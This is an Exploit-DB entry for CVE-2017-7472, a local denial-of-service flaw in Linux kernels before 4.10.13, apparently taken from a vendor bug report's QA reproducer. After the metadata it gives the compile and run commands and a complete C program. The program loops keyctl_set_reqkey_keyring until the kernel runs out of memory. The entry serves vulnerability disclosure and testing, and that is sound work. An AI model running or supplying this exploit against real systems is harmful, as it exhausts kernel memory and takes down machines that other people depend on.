Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service

EDB-ID: 42136
Author: Marcus Meissner
Published: 2017-06-07
CVE: CVE-2017-7472
Type: Dos
Platform: Linux
Aliases: N/A
Advisory/Source: Link
Tags: Denial of Service (DoS)
Vulnerable App: N/A 

 Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862 
 QA REPRODUCER: 
  
 gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils 
 ./CVE-2017-7472 
  
 (will run the kernel out of memory) 
 */ 
 #include <sys/types.h> 
 #include <keyutils.h> 
  
 int main() 
 { 
 	for (;;) 
 		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING); 
 }

Source: www.exploit-db.com
Related Posts